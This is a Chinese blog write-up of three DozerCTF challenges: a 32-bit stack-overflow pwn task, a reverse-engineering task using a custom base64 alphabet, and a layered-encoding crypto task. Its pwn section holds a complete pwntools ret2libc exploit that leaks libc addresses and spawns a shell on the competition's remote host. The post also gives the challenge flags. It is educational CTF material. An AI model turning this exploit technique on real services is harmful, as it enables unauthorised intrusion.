DozerCTF Writeup

最新推荐文章于 2022-05-19 15:41:08 发布
最新推荐文章于 2022-05-19 15:41:08 发布
阅读量637 收藏 1
点赞数
文章标签: CTF Writeup DozerCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/106752804
版权

pwn - ret2 temp

一开始记得不是这个题目名字,应该是 ret2dl-resolve ,高大上东西不会

分析

保护情况

32 位动态链接;打开 NX ;

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
漏洞函数

read 函数栈溢出

ssize_t vuln()
{
  char buf; // [esp+Ch] [ebp-6Ch]

  setbuf(stdin, &buf);
  return read(0, &buf, 0x100u);
}

思路

泄露 libc

栈溢出,用 write 泄露 libc 地址:

payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
get shell

libc-database 查远程的 libc 是:libc6-i386_2.23-0ubuntu11_amd64.so

payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(system) + p32(0xdeadbeef) + p32(binsh)

exp

from pwn import *
context.log_level = 'debug'

#p = process("./pwn")
p = remote("118.31.11.216",36666)
elf = ELF("./pwn")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
libc = ELF("./libc.so")

main_addr = 0x0804851f
write_plt = elf.plt['write']
log.info("write_plt:"+hex(write_plt))
write_got = elf.got['write']
log.info("write_got:"+hex(write_got))

payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)


p.recvuntil("!\n")
p.send(payload)

write_leak = u32(p.recv(4))
log.info("write_leak:"+hex(write_leak))

libc_base = write_leak - libc.symbols['write']
log.info("libc_base:"+hex(libc_base))

system = libc_base + libc.symbols['system']
log.info("system:"+hex(system))

binsh = libc_base + libc.search('/bin/sh').next()
log.info("binsh:"+hex(binsh))

#onegadget = 0x3ac5c + libc_base
#log.info("onegadget:"+hex(onegadget))

payload = 'a'*0x6c+p32(0xdeadbeef)
#payload += p32(0x08048362) + p32(onegadget)
payload += p32(system) + p32(0xdeadbeef) + p32(binsh)

p.recvuntil("!\n")
#gdb.attach(p)
p.send(payload)

p.interactive()

RE - 貌似有些不对

上面字符串 base 加密,下面自定义 自定义密码表 :

解密脚本:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : MrSkYe
# @Email   : skye231@foxmail.com
# @File    : base_diy.py

# 自定义加密表
#s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"#原版
s = "ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/"#自定义

def My_base64_encode(inputs):
	# 将字符串转化为2进制
	bin_str = []
	for i in inputs:
		x = str(bin(ord(i))).replace('0b', '')
		bin_str.append('{:0>8}'.format(x))
	#print(bin_str)
	# 输出的字符串
	outputs = ""
	# 不够三倍数,需补齐的次数
	nums = 0
	while bin_str:
		#每次取三个字符的二进制
		temp_list = bin_str[:3]
		if(len(temp_list) != 3):
			nums = 3 - len(temp_list)
			while len(temp_list) < 3:
				temp_list += ['0' * 8]
		temp_str = "".join(temp_list)
		#print(temp_str)
		# 将三个8字节的二进制转换为4个十进制
		temp_str_list = []
		for i in range(0,4):
			temp_str_list.append(int(temp_str[i*6:(i+1)*6],2))
		#print(temp_str_list)
		if nums:
			temp_str_list = temp_str_list[0:4 - nums]
			
		for i in temp_str_list:
			outputs += s[i]
		bin_str = bin_str[3:]
	outputs += nums * '='
	print("Encrypted String:\n%s "%outputs)
	
def My_base64_decode(inputs):
	# 将字符串转化为2进制
	bin_str = []
	for i in inputs:
		if i != '=':
			x = str(bin(s.index(i))).replace('0b', '')
			bin_str.append('{:0>6}'.format(x))
	#print(bin_str)
	# 输出的字符串
	outputs = ""
	nums = inputs.count('=')
	while bin_str:
		temp_list = bin_str[:4]
		temp_str = "".join(temp_list)
		#print(temp_str)
		# 补足8位字节
		if(len(temp_str) % 8 != 0):
			temp_str = temp_str[0:-1 * nums * 2]
		# 将四个6字节的二进制转换为三个字符
		for i in range(0,int(len(temp_str) / 8)):
			outputs += chr(int(temp_str[i*8:(i+1)*8],2))
		bin_str = bin_str[4:]	
	print("Decrypted String:\n%s "%outputs)
	
print()
print("     *************************************")
print("     *    (1)encode         (2)decode    *")	
print("     *************************************")
print()


num = input("Please select the operation you want to perform:\n")
if(num == "1"):
	input_str = input("Please enter a string that needs to be encrypted: \n")
	My_base64_encode(input_str)
else:
	input_str = input("Please enter a string that needs to be decrypted: \n")
	My_base64_decode(input_str)

Crypto - 真·签到

给的一个程序,运行不起来,IDA 打开就很奇怪,然后随手往记事本一带,发现一串字符串。看这样子像是 base 64 :

R00yVE1NWlRIRTJFRU5CWUdVM1RNUlJURzRaVEtOUllHNFpUTU9CV0lJM0RRTlJXRzQ0VE9OSlhHWTJET05aUkc1QVRPTUJUR0kyRUVNWlZHNDNUS05aWEc0MlRHTkpaR1pBVElNUldHNDNUT05KVUc0M0RPTUJXR0kyRUtOU0ZHTTRUT09CVUc0M0VFPT09Cgo=

加密之后长这样:

GM2TMMZTHE2EENBYGU3TMRRTG4ZTKNRYG4ZTMOBWII3DQNRWG44TONJXGY2DONZRG5ATOMBTGI2EEMZVG43TKNZXG42TGNJZGZATIMRWG43TONJUG43DOMBWGI2EKNSFGM4TOOBUG43EE===

然后联想 base 32 的占位符(也就是 = )的可能是 6、4、3、1 个,又顺手解密后:

3563394B48576F37356873686B686679757647717A70324B3577577753596A426777547670624E6E3978476B

然后就是 16 进制转换字符串:

5c9KHWo75hshkhfyuvGqzp2K5wWwSYjBgwTvpbNn9xGk

然后再转一个 base 58 :

Dozerctf{base_family_is_so_good}

其实这种多重加密,用 CyberChef 能自动解出来一部分,这题的最后两步就是自动解出来的:

点击下面链接可以查看整个解密流程:
https://skyedai910.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Hex('None')From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)&input=UjAweVZFMU5XbFJJUlRKRlJVNUNXVWRWTTFSTlVsSlVSelJhVkV0T1VsbEhORnBVVFU5Q1YwbEpNMFJSVGxKWFJ6UTBWRTlPU2xoSFdUSkVUMDVhVWtjMVFWUlBUVUpVUjBreVJVVk5XbFpITkROVVMwNWFXRWMwTWxSSFRrcGFSMXBCVkVsTlVsZEhORE5VVDA1S1ZVYzBNMFJQVFVKWFIwa3lSVXRPVTBaSFRUUlVUMDlDVlVjME0wVkZQVDA5Q2dvPQ

SkYe231_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf
Lice_420的博客
04-26 155
第三周作业总结 第一题 题目:base16 实训描述: 64除于4,base家族中的一员。 然后下载附件 首先一看就知道 这肯定不是答案,不会有这么简单的答案,然后我中间的代码复制到在线解密网站上进行解密 看了一眼题目发现这是一个base16的题目然后将附件里的代码复制到网站里进行解密 从而得到密码: SeBaFi{6gaE5iXi34qOYQrj}第一题就解出来了 第二题 题目:bd 实训描述: 维纳攻击,最后以SeBaFi{}的形式提交得到的{}中的内容。 然后也是一样 下载附件 打开一闪而过,让
2023 强网杯 Writeup
最新发布
01-29
2023 强网杯 Writeup
CTF中常见的加密
热门推荐
qq_33356474的博客
06-02 1万+
这些加密方式是很常见的,但是这次解释的很肤浅,后面有机会对部分密码来个详细分析 1.培根密码: 培根所用的密码是一种本质上用二进制数设计的,没有用通常的0和1来表示,而是采用a和b。 特征:010101010101 第一种方式 Aaaaaa Baaaab Caaaba Daaabb Eaabaa Faabab Gaabba Haabbb Iabaaa ...
CTF常见加密方式汇总
dfdhxb995397的博客
12-19 1592
1.栅栏密码 在IDF训练营里做过一道关于栅栏密码的问题。 栅栏密码的解法很简单,也有点复杂,字符长度因数多得会有很多个密码。对,栅栏密码的解法就是:计算该字符串是否为合数,若为合数,则求出该合数除本身和1的因数,然后将字符串分隔。用笔者自己写的解法就是这样: 凯撒密码,古代凯撒大帝用来打仗时的密码。凯撒密码在外界也有很多种解法。这里我用在国外CTF平台WeChall一道凯...
python实现--CTF一些常用密码的编码解码功能
Force~
11-25 1754
文章目录前言python实现测试与总结 前言 写CTF题目总是会碰到很多需要解密的地方,比如常见的base家族和url编码转化,恰逢看到一些师傅的博客,受到启发利用python尝试实现了一下,目的是能够判断是base家族的什么加密方式并进行解密。然而期末将近未能实现目的,不过实现了一些加密解密功能,经过测试仍存在一些问题,在此进行分享学习。代码中已给出注释,可添加联系方式一起交流学习,期待你的建议与指导。 代码只是调用了一些标准库和第三方库(第三方库请自行进行下载(pip install xxxx)),
南京邮电大学CTF-密码学-mixed_base64
白浪的博客
05-01 1041
题目如下:1.先把code.txt保存为一个文件2.加密过程:    十次加密,每一次在base16,32,64中随机选择一种加密3.解密过程:    用python直接尝试爆破解密代码:#*****题目:多重base64加密 #*****python破解代码 import base64 def decode_mix_base64(b): a = b # print a ...
古典加密writeup
01-05
CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
Writeup.rar
12-01
Writeup.rar
WriteUp模板1
08-08
WriteUp模板1
DozerCTF-2nd:2019金陵科技学院校赛赛初赛web题源码及wp
03-23
推土机CTF-2nd 2019金陵科技学院第二届网络安全竞赛网站题解 web1果粉: 修改ua,包含iphone串口即可。 web2的React: 通过.index.php.swp还原出代码。 利用正则回溯机制导致的安全问题: import requests from io import BytesIO data = { 'greeting': BytesIO(b'Baby PHP' + b'a' * 1000000) } res = requests.post('http://120.27.3.220:10001/',data=data) print(res.text) web3 babyshop: 简单的bool形盲注,没有任何过滤... import requests import string perm = string.ascii_uppercase + string.d
CTF-writeup
03-19
CTF-writeup
茯苓多糖酶水解条件的研究
01-18
茯苓多糖酶水解条件的研究,边超,陈福生,茯苓多糖是茯苓的最主要成分,分子量大,不溶于水,无生物活性。本研究采用酶法水解茯苓多糖,降低分子量,增加水溶性,以期获得
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
writeup
03-15
writeup
lwip packet buffer管理API函数应用总结
烟酒僧的专栏
08-25 2556
看来学习也是一种坚持,本来昨天打算写的,可是太晚了一懒就拖到今天了。今天动笔想必也是会忘了很多。   1、lwip 的 pbuf 是数据链,它的首位没有相连,如果,你在头一个pbuf里面想要寻到下一个pbuf那么直接找寻p->next.如果要找下一个的下一个呢?可以用p->next->next。 至于p->ref是什么作用,相关文档上面说,当ref=0的时候,pbuf就自动解除掉。
CTF密码学之Base64,Base32,Base16
CharlesGodX的博客
05-09 5921
CTF-Base64 原理 Base64可以将ASCII字符串或者是二进制编码成只包含A—Z,a—z,0—9,+,/ 这64个字符( 26个大写字母,26个小写字母,10个数字,1个+,一个 / 刚好64个字符)。这64个字符用6个bit位就可以全部表示出来,一个字节有8个bit 位,那么还剩下两个bit位,这两个bit位用0来补充。其实,一个Base64字符仍然是8个bit位,但是有效部分只有右...
[BUUCTF-pwn] noxctf2018_the_name_calculator
weixin_52640415的博客
12-31 429
printf格式化字符串漏洞 漏洞点: main中读name有溢出,覆盖到v4可以进入下一步 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[28]; // [esp+Ch] [ebp-2Ch] BYREF int v4; // [esp+28h] [ebp-10h] unsigned int v5; // [esp+2Ch] [ebp-Ch] v5 = _
net.sf.dozer使用坑
龙城之家的博客
05-19 729
dozer做什么的 Dozer是Java Bean到Java Bean映射器,它以递归方式将数据从一个对象复制到另一个对象。通常,这些Java Bean将具有不同的复杂类型。 Dozer支持简单属性映射,复杂类型映射,双向映射,隐式显式映射以及递归映射。这包括映射还需要在元素级别进行映射的集合属性。 注意:dozer 目前不支持集合之间的转换 ,需要自己进行处理,稍后我会提供一个简单的工具类.` 问题描述 通过上图可以知道是jar包冲突导致的(slf4j-log4j12 和 logback-class
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值